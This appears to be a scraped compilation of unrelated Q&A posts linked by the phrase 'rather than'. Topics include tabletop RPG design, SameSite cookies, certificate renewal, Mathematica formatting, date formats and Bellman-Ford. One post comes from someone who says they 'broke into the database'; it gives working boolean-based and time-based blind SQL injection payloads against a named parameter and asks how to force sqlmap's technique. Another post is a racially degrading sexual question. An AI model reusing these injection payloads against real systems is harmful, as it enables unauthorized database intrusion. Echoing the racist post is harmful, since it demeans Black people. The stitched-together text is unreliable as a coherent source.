How do I play Masks to find out what changes, rather than to find out what happens?

Many Powered by the Apocalypse games make an agenda item of playing to find out what happens, discarding notions of “this will be my arc and this is how any particular scene from it will go” and looking to the unexpected for maximum fun and excitement.

Masks: A New Generation has a particularly different phrasing, “play to find out what changes”, and the long description tells me a lot of things that read rather like “play to find out what happens” with a new coat of paint.

You don’t know exactly what will happen over the course of the game. You don’t know who the PCs will become. You don’t know how they’ll change the city. That’s why you’re playing in the first place—because you’re excited to find out! MASKS is a game about change, about young people growing up, about the city reacting and reshaping itself in response to the people within it. Don’t plan on any single course of events coming true—plan only on pushing and prodding the characters and the setting to see what it might become.

What is the key to understanding this agenda item, and how do I best fulfill it without leaning too heavily on a Dungeon World background (as the GM and as a player)?

What are some possible repurcussions of using story-based leveling rather than experience points?

I am the DM for a D&D 4e game. Recently, I stopped keeping track of XP, on the assumption that I could just give my players a level every time they finished a major quest. In my mind, this had a few benefits:

  1. It severely reduces bookkeeping, both for the players, and for me, because it means I don’t have to worry about each adventure having exactly ten encounters.
  2. It prevents leveling at an awkward time ― we’ll never have an issue where the PCs finish an adventure and aren’t quite leveled up, and then get an encounter or two into the next adventure. In this way, it also helps split the game into even chunks.
  3. It also removes a mindset that I think a lot of players pick up from videogames, where they feel like they need to go fight monsters and engage in random, pointless fights just to gain XP. This is not the sort of thing I want.

However, before I completely commit to this progression system, I’m like to see it from the opposite perspective, to see what I may be missing out on by abandoning XP.

What benefits does an XP-based leveling system offer that I will lose if I use a story-based leveling system?

Why SetCookie’s SameSite directive applies the destination rather than the origin?

I understand that the SameSite directive tries to protect against cross-origin leakages and CSRFs (see OWASP), but I don’t get why (on my browser at least) it applies to the cookie’s destination rather than on the client’s origin. As a consequence of that choice, it is impossible to benefit from SameSite protection in legitimate cross-origin scenarios.

Let’s say I host some API on https://API and some front-end application on https://FRONT:

    +----------+                                                  +----------+     | FRONT    |                                                  | API      |     |----------|                                                  |----------|     |          |                                                  |          |     |        1 +---------------OPTIONS-/login--------------------->          |     |          |                                                  |          |     |          <----------200--Allow-Origin:-FRONT----------------+ 2        |     |          |                                                  |          |     |        3 ----------------POST-/login------------------------|          |     |          |                                                  |          |     |          <-------201-Set-Cookie:-AccessToken:-sk_123--------+ 4        |     |          |                       HttpOnly;Secure;           |          |     |          |                       SameSite: Strict           |          |     |          |                                                  |          |     |        5 +---------------POST-/protected-------------------->          |     |          |                                                  |          |     |          <----------------403-Forbidden---------------------+ 6        |     +----------+                                                  +----------+ 

In this scenario, my user-agent just ignores the Set-Cookie directive (4). But since the Set-Cookie directive took place while the client was on FRONT, I would have expected it to work. I thought “SameSite” cookie meant “The client was on the same site when the cookie was set and when the cross-origin request was made” which makes a lot of sense from the user’s perspective. But it rather means “The cookie was set on the same site it’s being requested from”. Consequently, in this scenario, you have to set SameSite value to None (otherwise, it’s just dropped) and fallback to the good old “manual” CSRF protection mechanism.

My question is: is there any upside of the current implementation of the SameSite directive from a security standpoint? Would a UA that had implemented the SameSite directive the way I thought it worked be vulnerable to some kind of attacks? Is there any chance that we see some kind of Strict+SameOrigin value for SameSite directive someday?


[ Politics ] Open Question : Who would you rather make love to?

out of these to people who would you rather make love to and tell me your gender, race and sexual orientation. 1)is a 19 year old white female. she is 5,5 tall, weighs 100 pounds. has flawless porcelain milky white skin, crystal clear blue eyes and strawberry blonde hair. 2)is a 25 year old black male. is 6,8 tall, weighs 400 pounds and has pitch black dark skin to the point that you couldn’t see him when its night time.

Is it possible to renew a certificate to allow end users to continue using the existing one, rather than having them implement the new one?

My organization has several certificates used for web services that are going to expire soon. We want to have these certificates renewed so that the service to our clients is uninterrupted and doesn’t require any action on their part. Is this possible, and if so, what would need to be done (e.g. create a CSR from the existing certificate, etc.)? Thank you in advance

Is there a way to substitute a Bracket for a Matrix Rather than a Parentheses When Using Traditional Form

I’m trying to use Mathematica to work my way through some Linear Algebra problems given by Gilbert Strang (Introduction to Linear Algebra). Consequently, I would like to use his notation as much as possible, in part, to learn better how to typeset using Mathematica and potentially to develop a complete set of answers to his problem sets using Mathematica rather than Matlab or R that mimics the look of his text.

Traditional form using Mathematica will place a parentheses () around a matrix or column vector, which is a common representation to recognize an array as a matrix (column vector). However, Strang uses brackets [], another common notation to reflect a matrix.

In a previous question regarding TraditionalForm some suggested that in the cases of functions one could use one of several user-defined functions to do this.

tF = RawBoxes[ToBoxes[TraditionalForm[#]] /. {"(" -> "[", ")" -> "]"}] &;  tF2 = Module[{f = ToString@#2}, RawBoxes[MakeBoxes[TraditionalForm[#]] //.    RowBox[{f, "(", else___, ")"}] :> RowBox[{"f", "[", else, "]"}]]] &;      makeBracketsF[f_] := (f /: MakeBoxes[f[a___], TraditionalForm] :=  RowBox[{ToString@f, "[", MakeBoxes[Row[{a}, ","], TraditionalForm],   "]"}]) 

However, the last two fail, as either the slot can not be filled with a matrix (column vector) with more than two rows, or the Traditional form is protected and can not be passed from the Module. The first answer gets close, but the bracket only surrounds the central value and does not encompass all three values, making the output look funky rather than typeset.

Is there a way to accomplish this seemingly simple substitution to permit a more flexible use of Traditional form to surround a matrix with a suitably sized pair of brackets to conform to a widely used traditional form for matrices?

Set injection method to Boolean blind rather than time based

So I’ve managed to break into the database and I’m given the following vulnerabilities

Parameter: postids (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: d=1&cmd=get_spam_data&postids=(SELECT (CASE WHEN (1972=1972) THEN 2 ELSE (SELECT 1472 UNION SELECT 7373) END))  Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: d=1&cmd=get_spam_data&postids=2 AND (SELECT 9066 FROM (SELECT(SLEEP(5)))VKKG) 

When I run a db query it seems to default to time based instead of the faster boolean based. I’m not interested in waiting an hour for the database search to finish. I tried the default –technique value which does boolean first but it still defaults to time-based.

Why EEE, (comma) rather than EEE. (period) in date formats with unabbreviated months?

This is a completely personal quest, but I’m really wondering why the standard abbreviated Day format is EEE, even when the month isn’t abbreviated?

I personally think that EEE. looks aesthetically nicer, and doesn’t create any barriers to reading the date.

So I’m just wondering how this happened and hoping to hear from some folks that feel very strongly about it 🙂

so Mon. January 1st, 2019 vs Mon, January 1st, 2019

Why does Bellman-Ford algorithm use < rather than ≤?

The Bellman-Ford Algorithm uses a less-than symbol rather than a less-than-or-equal-to symbol. How does this identify that there is a negative cycle?

For instance, say I have the below example going from initialization state through the first iteration and on to the second.

Initial state

    (0)S----(1)----B(inf)         \         /         (1)    (-1)             \     /            \   /               C(inf) 

First iteration

...Check edges... S->B D[S] + 1 < D[B] = 0 + 1 < inf => True => Update D[B]  B->C D[B] + (-1) < D[C] = 1 + (-1) < inf => True => Update D[C]      (0)S----(1)----B(1)         \         /         (1)    (-1)             \     /            \   /               C(0) 

Second iteration when checking for negative cycles

...Check edges... ...Skipping to check B->C... B->C D[B] + (-1) < D[C] = 1 + (-1) < 0 => False         (0)S----(1)----B(1)         \         /         (1)    (-1)             \     /            \   /               C(0) 

Shouldn’t the last check between B->C be true to detect the negative cycle? i.e. Shouldn’t we use less-than-or-equal-to (≤) rather than (<)?